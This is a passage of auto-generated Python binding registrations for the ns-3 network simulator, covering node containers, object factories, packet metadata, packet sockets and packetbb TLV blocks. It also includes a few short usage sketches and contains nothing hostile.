def register_Ns3NodeContainer_methods(root_module, cls):
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'arg0')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer() [constructor]
cls.add_constructor([])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::Ptr<ns3::Node> node) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::Node >', 'node')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(std::string nodeName) [constructor]
cls.add_constructor([param('std::string', 'nodeName')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d, ns3::NodeContainer const & e) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd'), param('ns3::NodeContainer const &', 'e')])
## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::NodeContainer other) [member function]
cls.add_method('Add',
'void',
[param('ns3::NodeContainer', 'other')])
## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('Add',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')])
## node-container.h (module 'network'): void ns3::NodeContainer::Add(std::string nodeName) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'nodeName')])
## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::Begin() const [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >',
[],
is_const=True)
## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n) [member function]
cls.add_method('Create',
'void',
[param('uint32_t', 'n')])
## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n, uint32_t systemId) [member function]
cls.add_method('Create',
'void',
[param('uint32_t', 'n'), param('uint32_t', 'systemId')])
## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::End() const [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >',
[],
is_const=True)
## node-container.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NodeContainer::Get(uint32_t i) const [member function]
cls.add_method('Get',
'ns3::Ptr< ns3::Node >',
[param('uint32_t', 'i')],
is_const=True)
## node-container.h (module 'network'): static ns3::NodeContainer ns3::NodeContainer::GetGlobal() [member function]
cls.add_method('GetGlobal',
'ns3::NodeContainer',
[],
is_static=True)
## node-container.h (module 'network'): uint32_t ns3::NodeContainer::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
return
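# --- Editorial sketch: typical use of the NodeContainer wrapper registered above
# (Create/Get/GetN). Assumes the generated ns.network module is importable; the node count
# is illustrative.
def _node_container_sketch():
    import ns.network
    nodes = ns.network.NodeContainer()
    nodes.Create(3)           # instantiate three ns3::Node objects
    first = nodes.Get(0)      # ns3::Ptr<ns3::Node>
    return nodes.GetN(), first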
def register_Ns3NodeList_methods(root_module, cls):
## node-list.h (module 'network'): ns3::NodeList::NodeList() [constructor]
cls.add_constructor([])
## node-list.h (module 'network'): ns3::NodeList::NodeList(ns3::NodeList const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NodeList const &', 'arg0')])
## node-list.h (module 'network'): static uint32_t ns3::NodeList::Add(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('Add',
'uint32_t',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_static=True)
## node-list.h (module 'network'): static __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeList::Begin() [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >',
[],
is_static=True)
## node-list.h (module 'network'): static __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeList::End() [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >',
[],
is_static=True)
## node-list.h (module 'network'): static uint32_t ns3::NodeList::GetNNodes() [member function]
cls.add_method('GetNNodes',
'uint32_t',
[],
is_static=True)
## node-list.h (module 'network'): static ns3::Ptr<ns3::Node> ns3::NodeList::GetNode(uint32_t n) [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[param('uint32_t', 'n')],
is_static=True)
return
def register_Ns3ObjectBase_methods(root_module, cls):
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
cls.add_constructor([])
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
cls.add_method('GetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
is_const=True)
## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
cls.add_method('GetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
is_const=True)
## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
cls.add_method('ConstructSelf',
'void',
[param('ns3::AttributeConstructionList const &', 'attributes')],
visibility='protected')
## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
cls.add_method('NotifyConstructionCompleted',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectDeleter_methods(root_module, cls):
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter() [constructor]
cls.add_constructor([])
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter(ns3::ObjectDeleter const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectDeleter const &', 'arg0')])
## object.h (module 'core'): static void ns3::ObjectDeleter::Delete(ns3::Object * object) [member function]
cls.add_method('Delete',
'void',
[param('ns3::Object *', 'object')],
is_static=True)
return
def register_Ns3ObjectFactory_methods(root_module, cls):
cls.add_output_stream_operator()
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(ns3::ObjectFactory const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectFactory const &', 'arg0')])
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(std::string typeId) [constructor]
cls.add_constructor([param('std::string', 'typeId')])
## object-factory.h (module 'core'): ns3::Ptr<ns3::Object> ns3::ObjectFactory::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::Object >',
[],
is_const=True)
## object-factory.h (module 'core'): ns3::TypeId ns3::ObjectFactory::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
## object-factory.h (module 'core'): void ns3::ObjectFactory::Set(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('Set',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(ns3::TypeId tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('ns3::TypeId', 'tid')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(char const * tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('char const *', 'tid')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(std::string tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('std::string', 'tid')])
return
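# --- Editorial sketch: the ObjectFactory wrapper registered above builds objects from a TypeId.
# The TypeId string below is only an example, and the ns.core import path is an assumption.
def _object_factory_sketch():
    import ns.core
    factory = ns.core.ObjectFactory()
    factory.SetTypeId("ns3::DropTailQueue")   # SetTypeId(std::string) overload bound above
    return factory.Create()                   # -> ns3::Ptr<ns3::Object>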
def register_Ns3PacketMetadata_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(uint64_t uid, uint32_t size) [constructor]
cls.add_constructor([param('uint64_t', 'uid'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(ns3::PacketMetadata const & o) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata const &', 'o')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddAtEnd(ns3::PacketMetadata const & o) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::PacketMetadata const &', 'o')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddHeader(ns3::Header const & header, uint32_t size) [member function]
cls.add_method('AddHeader',
'void',
[param('ns3::Header const &', 'header'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddPaddingAtEnd(uint32_t end) [member function]
cls.add_method('AddPaddingAtEnd',
'void',
[param('uint32_t', 'end')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddTrailer(ns3::Trailer const & trailer, uint32_t size) [member function]
cls.add_method('AddTrailer',
'void',
[param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator ns3::PacketMetadata::BeginItem(ns3::Buffer buffer) const [member function]
cls.add_method('BeginItem',
'ns3::PacketMetadata::ItemIterator',
[param('ns3::Buffer', 'buffer')],
is_const=True)
## packet-metadata.h (module 'network'): ns3::PacketMetadata ns3::PacketMetadata::CreateFragment(uint32_t start, uint32_t end) const [member function]
cls.add_method('CreateFragment',
'ns3::PacketMetadata',
[param('uint32_t', 'start'), param('uint32_t', 'end')],
is_const=True)
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Deserialize(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::Enable() [member function]
cls.add_method('Enable',
'void',
[],
is_static=True)
## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::EnableChecking() [member function]
cls.add_method('EnableChecking',
'void',
[],
is_static=True)
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packet-metadata.h (module 'network'): uint64_t ns3::PacketMetadata::GetUid() const [member function]
cls.add_method('GetUid',
'uint64_t',
[],
is_const=True)
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtEnd(uint32_t end) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'end')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtStart(uint32_t start) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'start')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveHeader(ns3::Header const & header, uint32_t size) [member function]
cls.add_method('RemoveHeader',
'void',
[param('ns3::Header const &', 'header'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveTrailer(ns3::Trailer const & trailer, uint32_t size) [member function]
cls.add_method('RemoveTrailer',
'void',
[param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
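# --- Editorial sketch: PacketMetadata::Enable()/EnableChecking() are the static switches bound
# above; calling them before any packets are created is the usual order, stated here as an
# assumption rather than scanner output.
def _packet_metadata_enable_sketch():
    import ns.network
    ns.network.PacketMetadata.Enable()          # record per-packet header/trailer metadata
    ns.network.PacketMetadata.EnableChecking()  # additionally verify add/remove consistency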
def register_Ns3PacketMetadataItem_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::Item() [constructor]
cls.add_constructor([])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::Item(ns3::PacketMetadata::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata::Item const &', 'arg0')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::current [variable]
cls.add_instance_attribute('current', 'ns3::Buffer::Iterator', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentSize [variable]
cls.add_instance_attribute('currentSize', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentTrimedFromEnd [variable]
cls.add_instance_attribute('currentTrimedFromEnd', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentTrimedFromStart [variable]
cls.add_instance_attribute('currentTrimedFromStart', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::isFragment [variable]
cls.add_instance_attribute('isFragment', 'bool', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3PacketMetadataItemIterator_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator::ItemIterator(ns3::PacketMetadata::ItemIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata::ItemIterator const &', 'arg0')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator::ItemIterator(ns3::PacketMetadata const * metadata, ns3::Buffer buffer) [constructor]
cls.add_constructor([param('ns3::PacketMetadata const *', 'metadata'), param('ns3::Buffer', 'buffer')])
## packet-metadata.h (module 'network'): bool ns3::PacketMetadata::ItemIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item ns3::PacketMetadata::ItemIterator::Next() [member function]
cls.add_method('Next',
'ns3::PacketMetadata::Item',
[])
return
def register_Ns3PacketSocketAddress_methods(root_module, cls):
## packet-socket-address.h (module 'network'): ns3::PacketSocketAddress::PacketSocketAddress(ns3::PacketSocketAddress const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketSocketAddress const &', 'arg0')])
## packet-socket-address.h (module 'network'): ns3::PacketSocketAddress::PacketSocketAddress() [constructor]
cls.add_constructor([])
## packet-socket-address.h (module 'network'): static ns3::PacketSocketAddress ns3::PacketSocketAddress::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::PacketSocketAddress',
[param('ns3::Address const &', 'address')],
is_static=True)
## packet-socket-address.h (module 'network'): ns3::Address ns3::PacketSocketAddress::GetPhysicalAddress() const [member function]
cls.add_method('GetPhysicalAddress',
'ns3::Address',
[],
is_const=True)
## packet-socket-address.h (module 'network'): uint16_t ns3::PacketSocketAddress::GetProtocol() const [member function]
cls.add_method('GetProtocol',
'uint16_t',
[],
is_const=True)
## packet-socket-address.h (module 'network'): uint32_t ns3::PacketSocketAddress::GetSingleDevice() const [member function]
cls.add_method('GetSingleDevice',
'uint32_t',
[],
is_const=True)
## packet-socket-address.h (module 'network'): static bool ns3::PacketSocketAddress::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
## packet-socket-address.h (module 'network'): bool ns3::PacketSocketAddress::IsSingleDevice() const [member function]
cls.add_method('IsSingleDevice',
'bool',
[],
is_const=True)
## packet-socket-address.h (module 'network'): void ns3::PacketSocketAddress::SetAllDevices() [member function]
cls.add_method('SetAllDevices',
'void',
[])
## packet-socket-address.h (module 'network'): void ns3::PacketSocketAddress::SetPhysicalAddress(ns3::Address const address) [member function]
cls.add_method('SetPhysicalAddress',
'void',
[param('ns3::Address const', 'address')])
## packet-socket-address.h (module 'network'): void ns3::PacketSocketAddress::SetProtocol(uint16_t protocol) [member function]
cls.add_method('SetProtocol',
'void',
[param('uint16_t', 'protocol')])
## packet-socket-address.h (module 'network'): void ns3::PacketSocketAddress::SetSingleDevice(uint32_t device) [member function]
cls.add_method('SetSingleDevice',
'void',
[param('uint32_t', 'device')])
return
def register_Ns3PacketSocketHelper_methods(root_module, cls):
## packet-socket-helper.h (module 'network'): ns3::PacketSocketHelper::PacketSocketHelper() [constructor]
cls.add_constructor([])
## packet-socket-helper.h (module 'network'): ns3::PacketSocketHelper::PacketSocketHelper(ns3::PacketSocketHelper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketSocketHelper const &', 'arg0')])
## packet-socket-helper.h (module 'network'): void ns3::PacketSocketHelper::Install(ns3::Ptr<ns3::Node> node) const [member function]
cls.add_method('Install',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_const=True)
## packet-socket-helper.h (module 'network'): void ns3::PacketSocketHelper::Install(std::string nodeName) const [member function]
cls.add_method('Install',
'void',
[param('std::string', 'nodeName')],
is_const=True)
## packet-socket-helper.h (module 'network'): void ns3::PacketSocketHelper::Install(ns3::NodeContainer c) const [member function]
cls.add_method('Install',
'void',
[param('ns3::NodeContainer', 'c')],
is_const=True)
return
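# --- Editorial sketch: wiring the PacketSocketHelper::Install overloads bound above to a
# NodeContainer. Assumes an importable ns.network build; the node count is illustrative.
def _packet_socket_helper_sketch():
    import ns.network
    nodes = ns.network.NodeContainer()
    nodes.Create(2)
    helper = ns.network.PacketSocketHelper()
    helper.Install(nodes)   # NodeContainer overload; per-node and by-name overloads are also bound
    return nodes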
def register_Ns3PacketTagIterator_methods(root_module, cls):
## packet.h (module 'network'): ns3::PacketTagIterator::PacketTagIterator(ns3::PacketTagIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagIterator const &', 'arg0')])
## packet.h (module 'network'): bool ns3::PacketTagIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet.h (module 'network'): ns3::PacketTagIterator::Item ns3::PacketTagIterator::Next() [member function]
cls.add_method('Next',
'ns3::PacketTagIterator::Item',
[])
return
def register_Ns3PacketTagIteratorItem_methods(root_module, cls):
## packet.h (module 'network'): ns3::PacketTagIterator::Item::Item(ns3::PacketTagIterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagIterator::Item const &', 'arg0')])
## packet.h (module 'network'): void ns3::PacketTagIterator::Item::GetTag(ns3::Tag & tag) const [member function]
cls.add_method('GetTag',
'void',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::TypeId ns3::PacketTagIterator::Item::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
return
def register_Ns3PacketTagList_methods(root_module, cls):
## packet-tag-list.h (module 'network'): ns3::PacketTagList::PacketTagList() [constructor]
cls.add_constructor([])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::PacketTagList(ns3::PacketTagList const & o) [copy constructor]
cls.add_constructor([param('ns3::PacketTagList const &', 'o')])
## packet-tag-list.h (module 'network'): void ns3::PacketTagList::Add(ns3::Tag const & tag) const [member function]
cls.add_method('Add',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData const * ns3::PacketTagList::Head() const [member function]
cls.add_method('Head',
'ns3::PacketTagList::TagData const *',
[],
is_const=True)
## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Peek(ns3::Tag & tag) const [member function]
cls.add_method('Peek',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Remove(ns3::Tag & tag) [member function]
cls.add_method('Remove',
'bool',
[param('ns3::Tag &', 'tag')])
## packet-tag-list.h (module 'network'): void ns3::PacketTagList::RemoveAll() [member function]
cls.add_method('RemoveAll',
'void',
[])
return
def register_Ns3PacketTagListTagData_methods(root_module, cls):
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData() [constructor]
cls.add_constructor([])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData(ns3::PacketTagList::TagData const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagList::TagData const &', 'arg0')])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::count [variable]
cls.add_instance_attribute('count', 'uint32_t', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::data [variable]
cls.add_instance_attribute('data', 'uint8_t [ 20 ]', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::next [variable]
cls.add_instance_attribute('next', 'ns3::PacketTagList::TagData *', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3PbbAddressTlvBlock_methods(root_module, cls):
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('!=')
## packetbb.h (module 'network'): ns3::PbbAddressTlvBlock::PbbAddressTlvBlock(ns3::PbbAddressTlvBlock const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbAddressTlvBlock const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbAddressTlvBlock::PbbAddressTlvBlock() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressTlv> ns3::PbbAddressTlvBlock::Back() const [member function]
cls.add_method('Back',
'ns3::Ptr< ns3::PbbAddressTlv >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressTlvBlock::Begin() [member function]
cls.add_method('Begin',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressTlvBlock::Begin() const [member function]
cls.add_method('Begin',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::Clear() [member function]
cls.add_method('Clear',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::Deserialize(ns3::Buffer::Iterator & start) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')])
## packetbb.h (module 'network'): bool ns3::PbbAddressTlvBlock::Empty() const [member function]
cls.add_method('Empty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressTlvBlock::End() [member function]
cls.add_method('End',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressTlvBlock::End() const [member function]
cls.add_method('End',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressTlvBlock::Erase(std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > position) [member function]
cls.add_method('Erase',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressTlvBlock::Erase(std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > first, std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > last) [member function]
cls.add_method('Erase',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >', 'first'), param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >', 'last')])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressTlv> ns3::PbbAddressTlvBlock::Front() const [member function]
cls.add_method('Front',
'ns3::Ptr< ns3::PbbAddressTlv >',
[],
is_const=True)
## packetbb.h (module 'network'): uint32_t ns3::PbbAddressTlvBlock::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressTlvBlock::Insert(std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > position, ns3::Ptr<ns3::PbbAddressTlv> const tlv) [member function]
cls.add_method('Insert',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >', 'position'), param('ns3::Ptr< ns3::PbbAddressTlv > const', 'tlv')])
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::PopBack() [member function]
cls.add_method('PopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::PopFront() [member function]
cls.add_method('PopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::Print(std::ostream & os, int level) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os'), param('int', 'level')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::PushBack(ns3::Ptr<ns3::PbbAddressTlv> tlv) [member function]
cls.add_method('PushBack',
'void',
[param('ns3::Ptr< ns3::PbbAddressTlv >', 'tlv')])
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::PushFront(ns3::Ptr<ns3::PbbAddressTlv> tlv) [member function]
cls.add_method('PushFront',
'void',
[param('ns3::Ptr< ns3::PbbAddressTlv >', 'tlv')])
## packetbb.h (module 'network'): void ns3::PbbAddressTlvBlock::Serialize(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True)
